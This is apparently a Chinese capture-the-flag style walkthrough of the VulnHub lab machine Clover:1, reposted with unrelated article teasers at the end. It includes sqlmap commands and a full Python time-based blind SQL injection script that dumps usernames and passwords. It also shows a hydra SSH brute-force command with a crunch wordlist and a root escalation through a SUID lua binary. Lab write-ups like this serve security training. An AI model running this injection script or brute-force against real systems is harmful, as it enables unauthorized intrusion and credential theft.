【靶机】vulnhub靶机clover:1

news2024/11/25 0:13:17

靶机下载地址:

Clover: 1 ~ VulnHub

靶机ip:192.168.174.145

Kali ip:192.168.174.128

靶机ip发现sudo arp-scan -l

靶机开放端口扫描

分析:

发现开放了21端口ftp服务,且允许匿名登录

22端口ssh服务

80端口和一些其他的

先对ftp进行查看

查看maintenance目录下的内容

使用get将文件下载下来进行查看。

进行locale文件的解密,猜测是base64,没发现有什么用

进行80端口的扫描

gobuster dir -u http://192.168.174.145 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

查看一些其他的信息后在http://192.168.174.145/website/的源码中发现一些注释信息

进行搜索这个cms

https://paper.bobylive.com/Security/LARES-ColdFusion.pdf

在这里发现这个cms的一些信息

进行目录的查看

使用dirsearch.py进行目录扫描

发现登录界面

测试一下是否存在注入

成功注入登录,但没有得到其他的信息

http://192.168.174.145/CFIDE/Administrator/login.php

发现存在延时注入,因此使用脚本进行爆库,首先使用sqlmap进行尝试,因为是post传参,所以抓包的信息存到文本再使用sqlmap

sqlmap -r test.txt --current-db

可以看到当前的数据库名称

查看数据库的表:sqlmap -r test.txt -D 'clover' –tables

查看列信息sqlmap -r test.txt -D 'clover' -T 'users' –columns

查看username和password的信息

sqlmap -r test.txt -D 'clover' -T 'users' -C 'username,password' –dump

进行md5解密

https://www.somd5.com/

当然  这里也可以使用我们自己的脚本来进行时间注入

自己写的脚本,也可以锻炼动手能力。

这是最终的结果图(最后的范围写小了,没显示全信息)

本人比较菜,脚本写的很拉,sqlmap固然好使,但尝试自己写一下也是不错的。之前用过手工的get传参的时间注入,今天做了post的时间注入,原理相同,request库的使用方式使用的json格式而已,学到了。get传参的时间注入可以在我的另一篇文章sqllibs靶场第十关有分享。

附上代码:

import requests
import string
import sys

headers = {"Content-Type": "application/x-www-form-urlencoded"}
all = string.printable
url = "http://192.168.174.145/CFIDE/Administrator/login.php/"


def extract_users():
    print("[+] Extracting clover dbname length")
    output = []
    for n in range(1, 10):
        payload = {"uname": "a' or if(length(database())>%d,0,sleep(3)) -- a" % n, "pswd": ""}
        r = requests.post(url, data=payload, headers=headers)
        if r.elapsed.total_seconds() > 3:
            length = n
            print(length)
            break
    print("[+] Extracting clover dbname")
    for i in range(1, length + 1):
        for char in all:
            payload = {
                "uname": "a' or if(ascii(substr(database()," + str(i) + ",1))=" + str(ord(char)) + ",sleep(3),1) -- a",
                "pswd": ""}
            # print(payload)
            r = requests.post(url, data=payload, headers=headers)
            # print(r.request.url)
            if r.elapsed.total_seconds() > 3:
                output.append(char)
                if char == ",":
                    print("")
                    continue
                print(char, end='', flush=True)


def table_name():
    output = []
    print("[+] Extracting clover db table_name")
    for z in range(0, 9):
        for i in range(1, 9):
            for char in '0123456789abcdefghijklmnopqrstuvwxyz,./-+*_':
                payload = {"uname": "a' or if(substr((select table_name from information_schema.tables "\
                                    "where table_schema=database() limit %d,1),%d,1)='%s',sleep(3),1) -- a" % (z, i, char),
                           "pswd": "a"}
                # print(url+payload)
                r = requests.post(url, data=payload, headers=headers)
                # print(r.request.url)
                if r.elapsed.total_seconds() > 3:
                    output.append(char)
                    if char == ",":
                        print("")
                        continue
                    print(char, end='', flush=True)


def column_name():
    output = []
    print("[+] Extracting clover db column_name")
    for z in range(0,15):
        for i in range(1,12):
            for char in '0123456789abcdefghijklmnopqrstuvwxyz\,,./-+*_':
                # http://127.0.0.1/sql1/Less-9/?id=1' and if(substr((select column_name from information_schema.columns
                # where table_name='users' limit 0,1),1,1)='s',1,sleep(5))--+
                payload = {"uname":"a' or if(substr((select column_name from information_schema.columns " \
                          "where table_name='users' limit %d,1),%d,1)='%s',sleep(2),1) -- a" % (z,i,char),
                           "pswd":"a"}
                # print(url+payload)
                r = requests.post(url, data=payload, headers=headers)
                # print(r.request.url)
                if r.elapsed.total_seconds() > 2:
                    output.append(char)
                    if char == ",":
                        print(",")
                        continue
                    print(char, end='', flush=True)


def list_data():
    output = []
    print("[+] Extracting clover db dump password and username")
    for i in range(1, 200):
        for char in '0123456789abcdefghijklmnopqrstuvwxyz#,@-+=)(*&*/.!+':
            payload = {"uname": "a' or if(substr((select group_concat(username,'-',password) from users " \
                      "),%d,1)='%s',sleep(3),1) -- a" % (i, char),
                   "pswd": "a"}
            # print(url+payload)
            r = requests.post(url, data=payload, headers=headers)
            # print(r.request.url)
            if r.elapsed.total_seconds() > 2:
                output.append(char)
                if char == ",":
                    print(",")
                    continue
                print(char, end='', flush=True)


try:
    # extract_users()
    # table_name()
    # column_name()
    list_data()
except KeyboardInterrupt:
    print("")
    print("[+] Exiting...")
    sys.exit()

接出来密码我们进行ssh登录

登录成功

使用sudo –l和find / -perm -u=s -type f 2>/dev/null

没发现可以利用的点

发现还有一个用户

尝试上传脚本,权限被拒绝

var目录看到reminder,得到sword的密码

得到密码是12位但是没给后四位

尝试crunch生成字典进行爆破

crunch 12 12 -t ‘P4SsW0Rd%%%%’ > pass.txt

百分号%的意思的用数组进行填充

使用hydra进行ssh爆破

hydra -l sword -P /home/ycx/Desktop/pas1.txt 192.168.174.145 ssh -f -vV -t 10

-t 延时

-f 找到就停止

-vV 输出详细信息

使用sword进行登录

查看具有suid权限的文件查询find / -perm -u=s -type f 2>/dev/null

进入lua界面

提权网站:https://gtfobins.github.io/gtfobins/lua/

成功root

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/193759.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【交换机转发工作原理【泛洪、转发、丢弃】】

新的一年 新的征程 新的课程开班 等你来学! ​一、交换机的三张表 在讲交换机转发工作原理前,先介绍交换机的三张表: 1.ARP缓存表:ARP(Address Resolution Protocol)地址解析协议,主要作用将目的IP地址解析(映射…

Linux系统中GDB调试详细操作方法

第一:启动 在shell下敲gdb命令即可启动gdb,启动后会显示下述信息,出现gdb提示符。 添加编译指令:gcc -g a.c -o test 打开指令:gdb test 或者 gdb 然后输入:file test ➜ example gdb …

数据结构:简单排序方法(插入排序和起泡排序)

1、插入排序 插入排序(insertion sort)的基本操作是将当前无序序列区 R[i…n]中的记录 R[i]“插入”到有序序列区 R[1…i-1]中,使有序序列区的长度增 1,如图所示。 例如,对下列一组记录的关键字: (49,38,65,76,27,13 ,91,52) (3-4) 进行插人排序的过…

【c语言】数据结构-带头双向循环链表

主页:114514的代码大冒险 qq:2188956112(欢迎小伙伴呀hi✿(。◕ᴗ◕。)✿ ) Gitee:庄嘉豪 (zhuang-jiahaoxxx) - Gitee.com 目录 共八种链表: 前言 一、结构简图与分析 二、链表操作详解(附代码实现&am…

js:原生ajax【纯js】

同步与异步区别同步:按顺序,依次执行,向服务器发送请求-->客户端做其他操作异步:分别执行,向服务器发送请求>同时执行其他操作原生ajax创建ajax对象var anew xmlhttprequest();设定数据的传输方式(ge…

电容笔和触控笔的区别是什么?触控笔排行榜

电容笔和触控笔在导电材料、作用机理、用途等方面来看,都有着很大的不同。电容笔采用设计中等大小的笔头,而且采用更耐磨的材料。随着科技的进步,人们的生活质量也在不断提高,无论是在工作中,还是在学习中,…

电子仿真软件MultiSIM

Multisim是美国国家仪器(NI)有限公司推出的以Windows为基础的仿真工具,适用于板级的模拟/数字电路板的设计工作。它包含了电路原理图的图形输入、电路硬件描述语言输入方式,具有丰富的仿真分析能力。 目前MultiSIM最新版本为14.2,可通过NI的…

利用ArcGIS进行生态敏感性的分析

【分析说明】 生态敏感性是指生态环境遭外界的干扰和侵入时,生态系统受损害的可能性大小,它可衡量外界干扰对生态环境造成的危害程度,通常生态敏感性越高,生态环境越容易受外界因素的影响地形、植被、水体方面的生态因子及其对该…

this作用全解(全局this 、函数this、全局函数 this call apply bind……)

文章目录this 是什么全局上下文的 this函数上下文的 this全局上下文中的函数对象中的函数箭头函数构造函数显式改变函数上下文的 thiscallapplybindthis 是什么 老是记不住 this 指向谁,我觉得这是非常正常的现象,因为 this 指向的情况本身就比较多&…

linux secure boot(安全启动)下为内核模块签名

文章目录linux secure boot(安全启动)下为内核模块签名背景Secure Boot安全启动开启关闭方法内核驱动签名生成签名证书和私钥导入签名证书BIOS(UEFI)导入证书(重要)制作带签名的驱动参考linux secure boot(安全启动)下为内核模块签名 背景 随着计算机性能和存储空间的提升&am…

Mybatis对象关联数据库表【对多关联AND对一关联】

一对多分成两部分&#xff1a;对一、对多 1. 准备两张表oder、customer 2. 对多关联实现 对多关联&#xff1a;Customer类下创建一个List集合OrderBean类 public class Customer {private Integer id;private String name;//对多关联private List<OrderBean> orderBeanL…

结构型设计模式 Structural Patterns :适配器 Adapter(Python 实现)

文章大纲 python 代码实现实现1实现2实现3解决实际问题的例子参考文献与学习路径使用示例: 适配器模式在 Python 代码中很常见。 基于一些遗留代码的系统常常会使用该模式。 在这种情况下, 适配器让遗留代码与现代的类得以相互合作。 识别方法: 适配器可以通过以不同抽象或…

visual studio2019 定位内存泄漏的方法

1、首先下载一个好用的工具&#xff0c;哈哈&#xff0c;链接在下方https://kinddragon.github.io/vld/下载完后&#xff0c;进行安装&#xff0c;安装完后&#xff0c;文件夹如下所示&#xff1a;2、下面就是打开visual studio进行配置&#xff0c;将include配置好&#xff0c…

关于MAC zsh: command not found: bee 处理方案

最近在玩GO语言&#xff0c;接触到GoBee 这个框架&#xff0c;安装完成后检查beego版本时发现了这个错误“zsh: command not found: bee”。 原因:GO环境配置出问题。 此博文跳过GO的安装过程&#xff0c;直接进入正题。前提是&#xff1a;已经装好了GO。MAC 环境&#xff0c…

六氟磷酸锂洗桶废水除氟树脂吸附工艺

在六氟磷酸锂过程中&#xff0c;主要排放合成氟化锂生产废水和产品六氟磷酸锂桶清洗废水&#xff0c;主要含有氟、磷酸盐及锂&#xff0c;这是一种高氟、高浓度磷酸盐无机化工废水。 针对这类高氟、高浓度磷酸盐无机化工废水&#xff0c;常用于这类生产废水的处理技术有化学沉淀…

力扣刷题|513.找树左下角的值、112. 路径总和、113.路径总和 ii、106.从中序与后序遍历序列构造二叉树、105.从前序与中序遍历序列构造二叉树

文章表一LeetCode 513.找树左下角的值题目链接&#x1f517;思路LeetCode 112. 路径总和题目链接&#x1f517;思路LeetCode 113.路径总和 ii题目链接&#x1f517;思路LeetCode 106.从中序与后序遍历序列构造二叉树题目链接&#x1f517;思路LeetCode 105.从前序与中序遍历序列…

Java-基础-5.多线程

一&#xff1a;为什么出现多线程&#xff1f; 1. 线程是指&#xff0c;一段代码的运行&#xff08;cpu&#xff0c;代码&#xff0c;数据&#xff09;。但是&#xff0c;生产中&#xff0c;我们真实情况&#xff0c;数据都是并发传送的&#xff0c;所以&#xff0c;我们仅仅使用…

城市交通应急广播系统方案

恒星科通发布于2023-2-2 一、城市交通指挥与疏导广播系统概述 城市交通指挥与疏导广播即“GSM 无线智能广播”&#xff0c;是利用 GSM 无线接入设备与扩音广播系统组合形成的一款 GSM 无线智能广播系统&#xff0c;该系统用在交通指挥与疏导等智能交通项目有不可替代的优势。系…

C语言之深入解析如何理解指针和结构体指针、指针函数、函数指针

一、指针变量 首先要明白指针就是一个变量&#xff0c;可以使用如下代码来验证&#xff1a; #include "stdio.h"int main(int argc, char **argv) {unsigned int a 10;unsigned int *p NULL;p &a;printf("&a %d\n",a);printf("&a …

Docker如何连接至本地私服Harbor中 推送镜像、查看镜像、下载镜像

1.基础环境 win/mac/linux装有Docker私服 Harbor Docker Docker中文站 Docker官方站 下载并安装Docker Harbor Harbor GitHub Harbor 官方地址 下载并安装 Harbor (测试的话 推荐用Docker镜像来启动Harbor 减少环境问题) 2.配置流程 登录Harbor 启动后 访问 Harbor 的…